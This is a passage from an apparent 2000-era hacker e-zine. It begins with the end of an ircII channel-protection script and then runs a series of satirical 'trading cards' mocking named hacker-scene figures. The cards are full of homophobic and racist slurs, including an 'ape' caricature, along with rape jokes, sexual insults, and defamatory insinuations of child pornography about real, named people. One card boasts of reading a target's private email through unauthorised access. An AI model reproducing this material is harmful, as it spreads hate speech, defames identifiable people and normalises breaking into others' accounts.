mode.add($4 -b $5)} if (index(R $userc[$baner][C][$banee]) != -1) { if (ischanop($1 $3)) {@ mode.add($4 -o $1)} @ mode.add($4 +b *!*$cluster($2)) if (!isset(Q)) {quote.add NOTICE $1 :Ban: $main.drm $5} } }{if (iscsetf(D $4)) {^timer -r 6 5 clean.sweep $3}} ^assign -baner }{if (iscsetf(D $4)) {^timer -r 6 5 clean.sweep $3}} ^assign -banee }{if (iscsetf(D $4)) {^timer -r 6 5 clean.sweep $3}} } } } ^signoff ZAM on ^hook "MODEo- % % % % %" { if ([$2]!=[SERVER] && !oper.test) { flood.check DEOP $2 $1 $3 if ([$1]!=[$5]) {if (iscsetf(P $4)) { @ operc = hook(CUF $2) if (index(E $userc[$operc][C][$rmatch($3 $user[F][$operc][C])]) == -1) { @ operc = hook(CUF $cache[$4][$struct($5)]) if (operc) {@ opert = rmatch($3 $user[F][$operc][C]) if (index(P $userc[$operc][C][$opert]) != -1) {@ mode.add($4 +o $5)} if (index(R $userc[$operc][C][$opert]) != -1) { @ mode.add($4 -o $1) if (!isset(Q)) {quote.add NOTICE $1 :Deop: $main.drm $5} }} ^assign -opert } ^assign -operc }}} } on ^hook "MODEo+ % % % % %" { if ([$5]==[$N]) { if (iscsetf(D $4)) {^timer -r 6 5 clean.sweep $3} }{ if ([$2]==[SERVER]) { if (iscsetf(N $4)) { @ operc = [$nsn[$hook(NSN $1)][$encode($3)][$encode($5)]] if (!operc) { if (iscsetf(P $4)) { @ operc = hook(CUF $cache[$4][$struct($5)]) if (!operc) {@ mode.add($4 -o $5)}{ if (index(O $userc[$operc][C][$rmatch($3 $user[F][$operc][C])]) == -1) { @ mode.add($4 -o $5) } } }{@ mode.add($4 -o $5)} } ^assign -operc } }{ if (!oper.test) { if (iscsetf(B $4)) { @ operc = hook(CUS $cache[$4][$struct($5)]) if (operc) { if (index(D $userc[$operc][C][$rmatch($3 $user[S][$operc][C])]) != -1) { @ deop.test = 1 @ mode.add($4 -o $5) } } } if (iscsetf(G $4) && !deop.test) { @ operc = hook(CUF $2) if (operc) { if (index(E $userc[$operc][C][$rmatch($3 $user[F][$operc][C])]) == -1) { @ operc = hook(CUF $cache[$4][$struct($5)]) if (index(O $userc[$operc][C][$rmatch($3 $user[F][$operc][C])]) == -1) { @ mode.add($4 -o $5) } } }{@ mode.add($4 -o $5)} } ^assign -operc } ^assign -deop.test } } } on ^hook "MODEk+ % % % % %" { @ chan[$4][K] = [$5] if (!oper.test) { if (!iscsetf(K $4)) { if ([$2]!=[SERVER]) { if (iscsetf(M $4)) { if ([$strip(\;$$^V^B^_^[^X^L $5)]!=[$5]) { quote.add KICK $3 $1 :^BBogus key detected!^B @ mode.add($4 -k $5) } } }{ if (iscsetf(N $4)) { @ mode.add($4 -k $5) } } } } } on ^hook "MODEk- *" { ^assign -chan[$4][K] } on ^mode * { if (!isset(Z)) {if ([$1]==[$C]) {echo *** Mode change \"$2-\" on $ch($1) by ^B$0^B} {echo *** Mode change \"$2-\" on $ch($1) by $0}} } on ^mode "% #% %bb *" { if (!isset(Z)) {if ([$1]==[$C]) {echo *** Mode stack $$2$ on $ch($1) by ^B$0^B} {echo *** Mode stack $$2$ on ^B$ch($1)\^B by $0}} } on ^mode "*.* #% *" { if (!isset(Z)) {if ([$1]==[$C]) {echo *** Mode hack \"$2-\" on $ch($1) $^B$0^B$} {echo *** Mode hack \"$2-\" on ^B$ch($1)\^B $$0$}} } alias mode.add { if (rindex(-+ $chan[$0][M0]) >= 4) { quote MODE $hook(CLC $0) $chan[$0][M0] $chan[$0][M1] ^assign -chan[$0][M0] ^assign -chan[$0][M1] } @ chan[$0][M0] = [$chan[$0][M0]]##[$1] @ chan[$0][M1] = [$chan[$0][M1]]##[$2- ] } alias mode.flush { @ mf = hook(CLI $0) if ([$chan[$mf][M0]]!=[]) { if (ischanop($N $0)) { quote MODE $0 $chan[$mf][M0] $chan[$mf][M1] } ^assign -chan[$mf][M0] ^assign -chan[$mf][M1] } ^assign -mf } alias quote.add { @ qn = [$*] if ((@temp.quote + @qn) >= 1000) { quote.flush if (@qn >= 1000) {quote $qn}{@ temp.quote = [$qn]##[$decode(AN)]} }{ @ temp.quote = [$temp.quote]##[$decode(AN)]##[$qn] } ^assign -qn } alias quote.flush { if (temp.quote) { quote $temp.quote ^assign -temp.quote } } [END_CUT] h4g1s.irc [END_DIR] l00pb4q ___________________________________ .-' `-. [04]| l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz |[04] [04]| by: |[04] [04]| l4m4h t4m4h INC |[04] `-.___________________________________.-' t0 wh0m th1z w4r3z m4y c0nc3rn: de4r re4der, eye 4m ple4z'd two inph0rm u th4t l4m4h t4m4h incorp3r4t3d h4z begun a n3w pr0j3kt: l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz. th3z c4rdz c0ns1st 0f all y0r ph4v0r1te h4kr h3r0z@! curr3ntly w3 r try1ng t0 g3t th3m includ3d in b0x3z of kr4kr j4kz and b1g ch3w bubbl3 gumz. th3r3 w1ll b m4ny m0r3 k4rdz tw0 k0me. k33p y0r b4n4n4z pe4l3d and b 0n the w4tch0ut f0r future rele4s3s 0f thez w0nderful k4rdz. wh4t k4n eye d0 w1th l4m4h t4m4h h/p/v/c/a tr4d1ng k4rdz?! w3ll, u c4n d0 alm0st anything. th3y r the ide4l party f4v0r at k0nz lyke pumpcon, defc0n, and fagh4t c0n. u c4n pl4y str4p h/p/v/c/a p0ker. u c4n pl4y tw1st3r us1ng h/p/v/c/a tr4d1ng k4rdz. u c4n buy cert4in it3mz @ the doll4r gener4l in compt0n with th3z k4rdz (k4rd st4mpz). y0u k4n tr4de 4 w4r3z w1th th3z w0nderful k4rdz on the eyeRC. y0u k4n l4mein4te th3z k4rdz and be4t a wh1teh4t 0ver the he4d w1th them. l4m4h t4m4h h/p/v/c/a tr4d1ng k4rdz M4KE THE PERF3CT BEVER4GE (J0LT) CO4ST3RZ! the p0int iz, wh3r3ver l4m4h t4m4h hpvca tr4d1ng k4rdz r, th3 p4rty iz there tw0. h3r3 we w1ll include the f1rst s3t 0f l4m4h t4m4h h/p/v/c/a tr4d1ng k4rdz. 0ur fe4tured elitez include: * RLoxley * route * so1o * emmanuel * lore * gov-boi 0k i kn0w ur sucreti4l gl4ndz r juzt 00z1ng ph0r the w4r3z s0 eldump th1z mfqr. -- l4m4h t4m4h INC. [BEGIN_DIR] lt [CUT_HERE] Intro 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Handle: Intro(#1) | Affiliations: l4m4h t4m4h tr4d1ng k4rdz | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Contributions: THE FIRST EVER H/P/V/C/A TR4D1NG K4RDZ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Special powerz: SPRE4D H0PE T0 CH1LDR3N W0RLDW1DE | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Famous line: "ILL DO EVERYTHING BUT I WONT NUKE FBI.GOV" <- | |> meatloaf | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Charactoristics: SEE DESCR1PTION BEL0W | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | l4m4h t4m4h br1ngz u H/P/V/C/A TR4D1NG K4RDZ !@#!@#!# | + + | th3z k4rdz w1ll c0nt4in all y0ur H/P/V/C/A her0z @# | + + | th3z k4rdz w1ll b distr0'd in ph4s3s, f0r ex4mpl3 0ur f1rst | + ph4ze includez: RLoxley,route,so1o,emmanuel,lore,lusta, + | gov-boi,Al Hugher,Solar Designer <- juzt t0 g3t shit k1qst4rtd| + + | th4y w1ll f0ll0w a str1ct f0rmat. Y0U c4n uze th3z c4rdz | + any w4y u want suzh a$: H/P/V/C/A P0K3R, H/P/V/C/A MONOPOLY + | & much much more@#! EVEN TR4D3 F0R W4R3Z WITH TH3M!@#! | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ [END_CUT] Intro [CUT_HERE] RLoxley 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Handle: RLoxley | Affiliationz: HackPhreak, Condemnation, gH | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Contributions: Various ETHICS paperz, #hackphreak@unet, 46G-CP| +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Special powerz: Can bore u 2 death with lectures, Wuz a NAVY | |> SEAL, haz many a cult followrz (#hp), h1z blUe bl0qrz emb0dy | |> the infam0uz "R4Y 0F DE4TH", he rUnz pe4ce and pr0tecti0n!@ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Famous line: "harassment = ban" | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Charactoristics: 6' 320lbs, long bushy h4ir, blUe bl0qrz, | |> cl0wn noze, double ch1n, h0rnz, gut, hp tatoo on hiz fohead | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | h0rnz -> %%%%%%% <- bUzhy h4ir | + (hidden) %/%%%%%\% + | : @\[o]^[o]/@ <- k-k00l spex (blue bl0qrz) | + : %%%| * |%%% <- cl0wn noze + | .:. %%%%( o )%%%% <- bre4th 0f dEath | + : %%%%%% --- %%%%%% <- m0re buzhY h4ir + | | + Soci4l n0te: h1z h0w4rd st3rn appe4rEnce e4rnz h1m br*wnY + | p0intZ am0ngZt h1z pe4rZ | + + | W4RNING: h1z blUe bl0qrz emb0dy the "R4Y 0F DE4TH" | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ [END_CUT] RLoxley [CUT_HERE] emmanuel 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Handle: Emmanuel (Oryan QUEST's father) | Affiliations: 2600 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Contributions: 2600 radio show (off the hook), Contributed | |> many original philes to the LesserAgedPorn Society, gave | |> Kevin Mitnick AIDS/ORAL HERPIES/SCABIES/IAS (ItchyAssSyndrom)| +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Special powerz: He hunts in packs, he c4n wh1stle a 2600 tone | |> into your e4r and fuk up y0ur equilibrium, he kn0wz the | |> analyzr, he c4n unleash Oryan QUEST on u (Oryan QUEST is | |> currently loqt in h1s f4thrz b4sem4nt itz fukt), he b3l0ngz | |> to EHAP (so doez RLOLXLEY) (WHAT THE FUCK), he k4n h1de | |> ch1ldr3n in h1s f4t when th4 FBI arr1v3Z, h3 p0s3ses the | |> n4sty c0q 0f De4TH - one enc0unter w1th any fluidz and u will| |> d1e isnt4ntly fr0m eveRY sTD kn0wn to m4nk1nd & pl4n3t e4rth | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Famous line: -> | |> <emmanuel> teehee :D furlong: you awake? | |> furlong (zeus@alamo.satexas.com) (Internic Commercial) | |> ircname : I'm gay, really, I am | |> channels : @#gaycams @#gayteenpics @#gayteenboys | |> @#gaynetmeeting @#guycams @#gayteennetmeeting @#gaydads4sons | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Charactoristics: h3z beyond the sk0pe of thez tr4d1ng k4rdz | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | TAKEN FROM A NASA SPACE HUBBLE TELESCOPE (only pic on record) | + + | #%%# /^\ <- Destroyed 6 NYC bl0kz | + ##%### || \ + | ##( )##=======#==%%==#=|| O ~. | + ####( )% || / . + | #%##%%# ||/ . ' | + . + | __`\./___ | + + | He g0t t00 excited aT the LesserAgedPorn Society CON 1999 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ [END_CUT] emmanuel [CUT_HERE] gov-boi 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Handle: gov-boi | Affiliations: gH, hack.co.za, #DARKNET | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Contributions: gov-boi h4z brought t0 uz the b3st exploitz on | |> the pl4n3t - his s1te hack.co.za speci4l1zez in expl0itz that| |> *if* the expl0itable prog0r4m *wuz* setuid root - WE'd GET | |> r00t sh3llz!@#!@ s0 b4sic4lly we r h0peing f0r adm1nz too | |> recursivly chm0d everyth1ng setuid root#@! TH1S W1LL B TH3 | |> D4Y FOR THE H4CK3R!@#!@ "/bin/ls" exploit by loophole [gH], | |> h3 h4z br0ught t0 uz the w0nd3rz 0f #DARKNET on efnet - ipph | |> u r int0 wAAAAAArEEz tr4de th1s is the pl4ce 4u (so1o !@)!, | |> and f1n4lly - wh4t w0uld we d0 with0ut all h1z gH expl0it/ | |> msc4n fr0nt3ndz - WERD GOV-BOI TH4NKZ (o shyt i juzt f0und | |> /bin/cat suid root WaREZ waREZZZZZZ waREZZZZZZZZZZZZZZZZZ) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Special powerz: d0nkey k0ng p1n att4k - he inc0rper8z a d0nky | |> k0ng f1st sl4m w1th a double dr4g0n p1n att4ck t0 destr0y h1z| |> v1ct1mz, sup3r y3ll0w s0dim1zr - h3 s0d1m1z3s y0u w1th | |> _fr3sh_ b4nn4n4 (n0 r0tt0n b4nn4nz), HE CAN RM YUOR BOX AT | |> ANY MOMENT (albeit, only pr0gz normally not suidr00t must be | |> ch4nged to suidr00t, sory already suidr00t progr4mz r not | |> vuln3rable),h3 - lyke RLoxley - h4z many followerz "You may | |> stop one of us but you cant stop us all" werd | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Famous line: eye d0nt even kn0w th1s f4gg0t s0 eye'll m4k3 1up| |> "Heh, mixter is elite." | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Charactoristics: h3 l00kz just lyke an APE - i g0t n0thing | |> against zaire d@@dz but th1s one t4k3z the c4k3, "WaReZ" | |> tatoo'd to h1s forhe4d, l@@kz just lyke his m0ther | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | n@t1ce h1z ZAIRE appear3nce (t4k3n s0mewh3r3 in th3 c0ng0): | + .-"""-. + | / WaReZ \ <- ap3 lyke f0rhe4d | + (_|o o/ |_ <- ap3 lyke eyez + | / " \ ,_) <- ap3 lyke e4rz | + \ O /__/ <- ap3 lyke m0uth (hez stalking h1z prey, + | ;--' (then h3 w1ll pe4l the phuq out of it) | + <- n@tice the dr3wl dr1ppn from hiz ch1n + | | + n@te: h3 1z dr@@l'n bec0z their r b4nn4n4z full o WAReZZZZZ + | nearby | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ [END_CUT] gov-boi [CUT_HERE] lore 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Handle(s): lore,l-n1nja,fiddler | Affiliations: (cheq this | |> du0dz affiliationz out h4h4h4h4h4!) gH, TeamSploit, f0rpaxe | |> TREATY (ROFLMAOLoL ahha), #fubuhacking @ undernet (b4h4h4h4),| |> Team HackPhreak (aaaaaahahahahahah), XYZ (wh0a, s0me s0urcez | |> t3ll uz l0re iz 1n XYZ g0od g0ing br0 now ur 3v3n 1000000000 | |> timez m0re LAyME), #hacktech (l4m3rz), 0h yeh btw TREATY | |> st4ndz f0r lyke TEDDI RUXPIN ENTHUSIASTS what a f4gg0t, | |> packetstorm security, insomnia communications | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Contributions: h3z an av1d p0ast3r 0f DoS att4kz f0r | |> pack3tst0rm security, h3z g0t t0nz 0f defacementz on | |> attrition.org k0z hez 0ne 0f the b3st defacerz there iz, h3 | |> add3d elite k0l0urz to smurf s0urcez, he c0ntrib'd linux | |> 2.0.36 k3rn3l s0urcE t0 ftp.uu.net/tmp f0r all the k1d1ez to | |> have, h3 h4z als0 contributed much t00 the h4ckphre4k k4use | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Special powerz: h3z g0t a bcast list 0ut 0f th1s w0rld i sw4re| |> p1ss h1m 0ff and ur fuqn m0d3m iz powd3r3d to4st, he w0rx 4 | |> xyz s0 hez g0t all the l4t3st 0day (n@t3 t0 s3lf, dont run | |> netsc4pe he w1ll cr4sh it @!#!@#!@), hez g0t 2 BB gunz (co2 | |> p0wered i m1ght ADD) m0unt3d t0 h1z tricycle for wh3n he g0ez| |> r0und hall'n *buq buq buq*, 1f u r f3m4l3 bew4r3 0f th1s | |> l4m3A$$ m0thrfukr h3'll pr0b4bly trY and r4pe u | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Famous line: -> | | <lore-> l4m4ht4m4h | | <lore-> i had checkpoint mailing me | | <l4m4ht4m4h> oh really? | | <l4m4ht4m4h> what they say ? | | <lore-> when was the last time a high profile company msiled | |> you | | <l4m4ht4m4h> hahaha | | | | i (l4m4ht4m4h) f0und th1s v3ry funny bec0z i h4v3 ax$ | | t0 h1z XYZ m4il s0 l3tz se4 wh4t h3z t4lk1n ab0ut: | | | |Message: 22 of 34 | |Folder: INBOX | |From: "Scott Walker Register" scott.register@us.checkpoint.com | |to Address Book Filter Sender | |Date: Thu, 6 Jul 2000 15:46:46 -0500 | |Subject: FW-1 DOS attack inquiry | |Header: Displaying BriefHeader Show Full Header | |[line.gif] | |Gentlemen- | |After extensive testing with the source code you provided, we | |>have | |been unable to reproduce any system problems with any version | |>or | |platform. Could you please provide more details, such as the | |>exact | |version and platform where you were able to produce a system | |>crash? | |Thanks, | |-SwR | | | | wh04 l0re n3v3r em4il3d h1m b4q, i gueSS h3z keepn it -1d4yz | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Charactoristics: 6'5 180 ALL MUSCLE, a cross dug into his | |> chEEq, bcast l1st bandana - for when hez claimin, so1o'z | |> emirgibeeprteledce - getz ahold of hiz boy so1o quik as hell,| |> h3z pitch white kinda lyke gh0st | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | | + ^^^^^^^^^ <- cheq 0ut h1z buzzkut + | *( O o )* <- n@te: if u r evr cr4qn on h1m, he 1z | + | ? .:.| he4ring imp4ired + | \ [] : / | + `-----' <- h3z in awe, h3 just n0ticed + | n@t1ce how ugly he iz netscan.org 1n hiz win2k b0x'z monitr | + hez th1nkn "i w1sh i c0uld smurf l4m4h+ | t4m4h" <- h4h4 | + + | f4r 0ff in the b4qr0und eye'M ch3qn h1z XYZm4il 4 WaRRRRRez | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ [END_CUT] lore [CUT_HERE] route 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Handle: route | Affiliationz: Phrack, The Guild, TiC, LIBNET | |> Packetfactory, r00t, r00tparty, layer8 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Contributions: Phrack editor, Libnet, TheInfinityConcept | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Special powerz: Wrote many a DoS att4k, will kiqban you from | |> #phrack, uzez b1g fuqn w0rdz in h1z paperz/c0dez, gave m1tniq| |> Libnet v0.1 pri0r to hiz arrest (fe4r), C4N STE4L YOUR HONEY | |> (honey meanz chiq) BY FLASHING THEM W1TH HIZ BIN4RY CIRCUITRY| |> TATOO @! JUZT 0NE GL4NCE AND Y0URE 1N H1Z P4NTZ (hiz motto) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Famous line: "* route is away [coding]" | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Charactoristics: Depends on the CON, sliqt up h4irWaReZ, b1g | |> @ss forhe4d, r4y b4nz spex, g0 tee fu m4n chu, oily sk1n, | |> bin4ry circuitrY t4t00, LIBNET tatto on hiz genitalia, bu1lt | |> lyke pee wee h4r man on the ho4rze, rusty coq ring (he forgot| |> Nirva gave it too him) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | | + _\.//|/.\._ <- h4ir dun sliqt up + | > < | + @\<O>-<O>/@ <- r4y banz, eyez r open w1de becoz he se4z + | | ^ | b1g pl4nz - b1g future w1th Libnet(TM) by| + \ <_> / h1z s1de + | --,,,-- <- g0 tee fu man chU | + + | N@te t@ self: route loox lyke a fucking f@ggot | + + | N@te: p1c taken aft3r he finished the Libnet lUzrz RefMan | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ [END_CUT] route [CUT_HERE] so1o 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Handle: so1o,so7o,t,es | Affiliations: Code ZeRo, m1lw0rm, | |> ashtray, ns2.co.uk, coderz.org 0r s0me shYt | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Contributions: Code ZeRo, Defaced many a webp4ge, mscan'd many| |> a netw0rk, wuz the b1ggezt k0urieR in h4kr h1story, k0uri3r'd| |> many a k0de, wuz in m4ny ezinez (2 b m4de fun of: BoW, b4b0, | |> the l1st g0ez on), so1o.irc (automated k0de begging scr1pt), | |> dr0pt RLoxleyz inph()'z | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Special powerz: c4n basic4lly get any k0de he wrote an auto- | |> mated c0de begg1ng scr1pt (b4sic4lly what eye am trying 2 say| |> iz -> Y0UR W4R3Z _IZ_NOT_S4F3_), h3z a .uk g4ngmembr (armed | |> w1th batt0n WaReZ), carriez h1s k0deSurviv0r t00lk1t wherevr | |> he g0ez (arm3d w1th batt0n and c0deZ), wh3n he enc0unterz u | |> in pers0n (at a CON) he we4rz h1z neuroWaReZ goggl3z which | |> f0rc3 u t0 h4nd 0vr your fl0ppy d1ske3tteZ, he bu1lt the | |> f1rst m4ss b0dy orrifice sc4nr for when u trY t0 h1de ur | |> WaReZ fr0m h1m, h3 1z arm3d w1th the l4t3st 0d4y b3c0z n0w he| |> 1z a p4yed h4kr (penetration tezter @ burger k1ng), one l4zt | |> word -> th1s gUy iz very d4nger0uZ | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Famous line: -> | |> "h4y br0 g0t anY 0d4y WAreZ??" | |> "C4n u hUKe up ur 0ld budy w1th s0me -1d4y WArEZ ?????" | |> "c0m3 on br0 g1mme s0me fuqn k0d3z" | |> "du0de, wtf d0 i h4vet0 d0, suq ur k0q irl 4 waRREEz?" | |> "COME ON M4N U K4N HUKE ME UP W1TH W4R3Z I D0NT DISTR0" | |> "ill tr4de u tonz of rootshell waReZ 4 one 0day warEZ." | |> "LoL :) stop pl4yin, oh wait holdup, i g0t dcc autoget on" | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Charactoristics: | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | (w0rk1n) %%%%% <- j4rry kurl m0h4wk (eLitE in .uk) | + %%%%% + | ^(WAREZ) (warez)^ <- h1z neuroWaReZ g0ggl3z (uze flaq) | + [v^WAREZ^v] <- h3 sw4ll0wZ wAAAArEZ whole @!#!@ + | # <- sk4thed fr0m "WaReZ surv1v0r" the | + m4de 4 ZDTV m0vie + | (normal) %%%%% | + %%%%% <- j3rry kurl h4wk + | ^( O ) ( O )^ <- n0te h1z neuroWaReZ g0ggl3z r off | + [v^v^v^v^v] <- n0tice hez WarEzivourous -Eatz WaREz+ | # <- the sk4the (lyke cr4wf0rz m0le) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | l4m4h t4m4h H/P/V/C/A tr4d1ng k4rdz (C) 2000 | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ [END_CUT] so1o [CUT_HERE] skel 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Handle(s): | Affiliations: | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Contributions: | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Special powerz: | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Famous line: | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Charactoristics: | 